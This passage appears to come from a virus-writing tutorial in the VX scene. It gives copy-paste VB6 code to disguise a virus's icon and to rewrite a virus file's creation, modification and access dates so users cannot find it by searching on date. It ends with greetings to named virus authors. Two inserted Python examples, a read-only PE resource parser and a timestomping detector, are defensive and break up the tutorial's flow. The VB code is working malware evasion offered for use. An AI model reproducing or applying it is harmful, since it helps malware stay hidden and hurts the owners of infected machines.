    Dim TempOffset As Long ' Difference of Offset and start of section
    ' Get distance between offset and start of resource section
    TempOffset = Offset - ResSectionOffset
    If TempOffset >= 0 Then
        ' Calculate RVA of the file offset
        Offset_to_RVA = ResSectionRVA + TempOffset
    Else
        Offset_to_RVA = -1
    End If
    Exit Function
ErrHandler:
End Function
---------------------------- Cut here & Start Copy-Paste from here -------------------------
The ReplaceIcons procedure (1st. Module) replaces our virus's icon with that *.Ico file (Source = path of the icon file, Dest = path of the file whose icon is to be replaced). This icon replacement has a few weaknesses. First, if the virus is compressed or packed with settings that strip or compress the file's resources, the replacement will not run smoothly. Second, for some files the extracted icon is sometimes not 16X16, or cannot be extracted at all.
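The packed-resources failure above comes down to where the resource directory's RVA lands in the section table. As an added read-only example (not the article's or Naveed's code), here is the GetResTreeOffset/RVA_to_Offset logic in Python, generalised to return None when the RVA falls in no section or in a section's memory-only tail; the section table and the data-directory entry are constructed.

```python
"""Find the on-disk offset of a PE's resource directory from its section
table, as the article's GetResTreeOffset/RVA_to_Offset do, but read-only and
with the "resources stripped or packed" case handled. Added example for this
page, not the article's code; the section table below is constructed."""
import struct

SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER (40 bytes)
RESOURCE_DIR_INDEX = 2        # IMAGE_DIRECTORY_ENTRY_RESOURCE


def parse_sections(table, count):
    """Decode `count` IMAGE_SECTION_HEADER records from `table`."""
    secs = []
    for i in range(count):
        name, vsize, va, rawsize, rawptr = struct.unpack_from(SECTION_HDR, table, i * 40)[:5]
        secs.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                     "va": va, "vsize": vsize, "rawsize": rawsize, "rawptr": rawptr})
    return secs


def _owner(secs, rva):
    """Section whose virtual span contains `rva`, or None."""
    for s in secs:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s
    return None


def rva_to_offset(secs, rva):
    """Map an RVA to a file offset. Returns None when the RVA is in no section
    or falls in the part of a section that exists only in memory (VirtualSize
    > SizeOfRawData), which is what a packer that drops resources leaves."""
    s = _owner(secs, rva)
    if s is None:
        return None
    delta = rva - s["va"]
    return s["rawptr"] + delta if delta < s["rawsize"] else None


def resource_tree_offset(secs, data_dirs):
    """data_dirs: list of (RVA, size) as in IMAGE_OPTIONAL_HEADER.DataDirectory.
    Returns (section name, file offset) or None if there is no usable tree."""
    rva, size = data_dirs[RESOURCE_DIR_INDEX]
    if size == 0:
        return None
    off = rva_to_offset(secs, rva)
    if off is None:
        return None
    return _owner(secs, rva)["name"], off


def make_section(name, va, vsize, rawptr, rawsize):
    """Constructed IMAGE_SECTION_HEADER for the samples below."""
    return struct.pack(SECTION_HDR, name.ljust(8, b"\0"), vsize, va, rawsize, rawptr,
                       0, 0, 0, 0, 0x40000040)


# Constructed layout: .text, a .rsrc with bytes on disk, and a .data section
# whose VirtualSize exceeds its raw size (the memory-only tail case).
SAMPLE_TABLE = (make_section(b".text", 0x1000, 0x2000, 0x400, 0x2000)
                + make_section(b".rsrc", 0x3000, 0x1000, 0x2400, 0x800)
                + make_section(b".data", 0x4000, 0x3000, 0x2C00, 0x1000))
SECTIONS = parse_sections(SAMPLE_TABLE, 3)


def sample_lookup(resource_rva):
    """Resolve a resource directory at `resource_rva` in the sample image."""
    dirs = [(0, 0)] * 16
    dirs[RESOURCE_DIR_INDEX] = (resource_rva, 0x100)
    return resource_tree_offset(SECTIONS, dirs)


if __name__ == "__main__":
    for rva in (0x3010, 0x3900, 0x8000):
        print(hex(rva), sample_lookup(rva))
```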
2. Changing the Date and Time of the Virus File
Which field is used most often when searching for a file in Windows? The file's access/modified/created time.
Take as an example a virus A.exe created on 1 Feb 2006 that starts infecting your computer on 2 Feb 2006. To find that file, all you need to do is fill in the search date field with the range 1 Feb 2006 to 2 Feb 2006.

What is to be done? We have to change the access/modified/created dates of our virus file so that the user cannot find it (or at least has a harder time). Here is source code that roughly illustrates the technique:
(Source code reference from the Internet, Author: marskarthik@angelfire.com)

---------------------------- Cut here & Start Copy-Paste from here -------------------------
Option Explicit
Public Declare Function SetFileTime Lib "kernel32" (ByVal hfile As Long, lpCreationTime As FILETIME, lpLastAccessTime As FILETIME, lpLastWriteTime As FILETIME) As Long
Public Declare Function GetFileTime Lib "kernel32" (ByVal hfile As Long, lpCreationTime As FILETIME, lpLastAccessTime As FILETIME, lpLastWriteTime As FILETIME) As Long
Public Declare Function FileTimeToLocalFileTime Lib "kernel32" (lpFileTime As FILETIME, lpLocalFileTime As FILETIME) As Long
Public Declare Function FileTimeToSystemTime Lib "kernel32" (lpFileTime As FILETIME, lpSystemTime As SYSTEMTIME) As Long
Public Declare Function SystemTimeToFileTime Lib "kernel32" (lpSystemTime As SYSTEMTIME, lpFileTime As FILETIME) As Long
Public Declare Function LocalFileTimeToFileTime Lib "kernel32" (lpLocalFileTime As FILETIME, lpFileTime As FILETIME) As Long
Public Declare Function OpenFile Lib "kernel32" (ByVal lpFileName As String, lpReOpenBuff As OFSTRUCT, ByVal wStyle As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Public Const OF_READ = &H0
Public Const OF_READWRITE = &H2
Public Const OF_REOPEN = &H8000
Public Const OF_SHARE_COMPAT = &H0
Public Const OF_SHARE_DENY_NONE = &H40
Public Const OF_SHARE_DENY_READ = &H30
Public Const OF_SHARE_DENY_WRITE = &H20
Public Const OF_SHARE_EXCLUSIVE = &H10
Public Const OF_VERIFY = &H400
Public Const OF_WRITE = &H1
Public Const OFS_MAXPATHNAME = 128

Public Type OFSTRUCT
    cBytes As Byte
    fFixedDisk As Byte
    nErrCode As Integer
    Reserved1 As Integer
    Reserved2 As Integer
    szPathName(OFS_MAXPATHNAME) As Byte
End Type

Public Type FILETIME
    dwLowDateTime As Long
    dwHighDateTime As Long
End Type

Public Type SYSTEMTIME
    wYear As Integer
    wMonth As Integer
    wDayOfWeek As Integer
    wDay As Integer
    wHour As Integer
    wMinute As Integer
    wSecond As Integer
    wMilliseconds As Integer
End Type

Public Sub ubahtanggal(pathfil As String, hari As Long, bulan As Long, tahun As Long, Optional creat As Boolean, Optional modif As Boolean, Optional acces As Boolean)
    On Error Resume Next
    Dim hfile As Long, rval As Long
    Dim buff As OFSTRUCT
    Dim ctime As FILETIME, latime As FILETIME, mtime As FILETIME
    Dim stime As SYSTEMTIME
    Dim fil As String
    If IsMissing(creat) Then creat = False
    If IsMissing(modif) Then modif = False
    If IsMissing(acces) Then acces = False
    hfile = OpenFile(pathfil, buff, OF_WRITE)
    If hfile Then
        rval = GetFileTime(hfile, ctime, latime, mtime)
        If creat Then
            ' Creation time: keep the clock time, replace the date
            rval = FileTimeToLocalFileTime(ctime, ctime)
            rval = FileTimeToSystemTime(ctime, stime)
            stime.wYear = tahun
            stime.wMonth = bulan
            stime.wDay = hari
            stime.wHour = Hour(Time)
            stime.wMinute = Minute(Time)
            stime.wSecond = Second(Time)
            rval = SystemTimeToFileTime(stime, ctime)
            rval = LocalFileTimeToFileTime(ctime, ctime)
        End If
        If modif Then
            ' Last-write time
            rval = FileTimeToLocalFileTime(mtime, mtime)
            rval = FileTimeToSystemTime(mtime, stime)
            stime.wYear = tahun
            stime.wMonth = bulan
            stime.wDay = hari
            stime.wHour = Hour(Time)
            stime.wMinute = Minute(Time)
            stime.wSecond = Second(Time)
            rval = SystemTimeToFileTime(stime, mtime)
            rval = LocalFileTimeToFileTime(mtime, mtime)
        End If
        If acces Then
            ' Last-access time
            rval = FileTimeToLocalFileTime(latime, latime)
            rval = FileTimeToSystemTime(latime, stime)
            stime.wYear = tahun
            stime.wMonth = bulan
            stime.wDay = hari
            stime.wHour = Hour(Time)
            stime.wMinute = Minute(Time)
            stime.wSecond = Second(Time)
            rval = SystemTimeToFileTime(stime, latime)
            rval = LocalFileTimeToFileTime(latime, latime)
        End If
        rval = SetFileTime(hfile, ctime, latime, mtime)
    End If
    rval = CloseHandle(hfile)
End Sub
---------------------------- Cut here & Start Copy-Paste from here -------------------------
The ubahtanggal procedure changes the date of the virus file, with the day, month and year parameters set as we like. The creat, modif and acces parameters indicate which date or time is changed; for example, if acces is True and the others False, only the access date and time are changed.
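One artefact of this routine, seen from the defender's side: FileTimeToSystemTime and SystemTimeToFileTime carry only whole milliseconds, so every timestamp the routine rewrites comes back with a zero 100-ns remainder below the millisecond. The added Python below (my own, not the article's or the referenced code) converts FILETIME values, reproduces that round trip, and flags the pattern across a file's three timestamps; the sample timestamps are constructed, and the check is a heuristic, since FAT volumes (2-second resolution) also yield millisecond-aligned times.

```python
"""Examine FILETIME values for the artefact a SYSTEMTIME round trip leaves:
a 100-ns tick count that is a whole number of milliseconds. Added example for
this page, not the article's code; the sample timestamps are constructed."""
from datetime import datetime, timedelta, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_MS = 10_000                      # FILETIME counts 100-ns intervals
UNIX_EPOCH_FT = 116_444_736_000_000_000    # 1970-01-01T00:00:00Z as FILETIME


def filetime_to_datetime(ft):
    """64-bit FILETIME -> aware UTC datetime (microsecond precision)."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    """Aware datetime -> 64-bit FILETIME."""
    return (dt - EPOCH_1601) // timedelta(microseconds=1) * 10


def systemtime_round_trip(ft):
    """What FileTimeToSystemTime followed by SystemTimeToFileTime leaves of a
    FILETIME: SYSTEMTIME stops at wMilliseconds, so the remainder is dropped."""
    return ft - ft % TICKS_PER_MS


def is_millisecond_aligned(ft):
    return ft % TICKS_PER_MS == 0


def assess(created, modified, accessed):
    """Findings for one file's created/modified/accessed FILETIMEs.

    A single aligned value is weak evidence on its own (FAT, some archivers);
    aligned values beside unaligned ones on the same file are the stronger
    signal, because NTFS sets all three with the same clock."""
    times = {"created": created, "modified": modified, "accessed": accessed}
    findings = []
    aligned = [name for name, ft in times.items() if is_millisecond_aligned(ft)]
    for name in aligned:
        findings.append(f"{name}: 100-ns remainder is zero "
                        f"({filetime_to_datetime(times[name]).isoformat()})")
    if 0 < len(aligned) < len(times):
        findings.append("mixed precision on one file: only " + ", ".join(aligned)
                        + " look rewritten through SYSTEMTIME")
    return findings


if __name__ == "__main__":
    # Constructed: a file stamped by NTFS with 100-ns precision...
    original = UNIX_EPOCH_FT + 1_234_567           # 123.4567 ms past the epoch
    # ...and the same file after only its creation time went through the round trip
    for line in assess(systemtime_round_trip(original), original + 5, original + 7):
        print(line)
```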
$> End...
Because of limited space and time I could only lay out 2 techniques that I think can be used to make it harder for the user to find the virus's parent file. I apologise if there are any shortcomings or statements that offend the reader.

$ Greetz...
>Myztx @ Myztx Soft. House, Hellspawn, Brontok Creator, Tomero, MyHeart Creator, Kantuk Creator, n The other Vx3rs.
>All members of the mailing lists: EcHo, Jasakom, Yogyafree, ITCenter, Virologi, Balihack, Informatics_01, ProgrammerVB n the others.
>Spyro, Vaganci, Yanto, n All my Friends at IA01 [2005], IA07 [2004] @ GunaDarma University, Depok.
>marskarthik@angelfire.com, (Naveed) neenojee@hotmail.com.
>Sites : VbBego.com, Virologi.info, Vaksin.com, Planet-Source-Code.com n the others.
$ Contact...
>Suggestions, criticism, flames, etc. are welcome and should be sent to the email address:
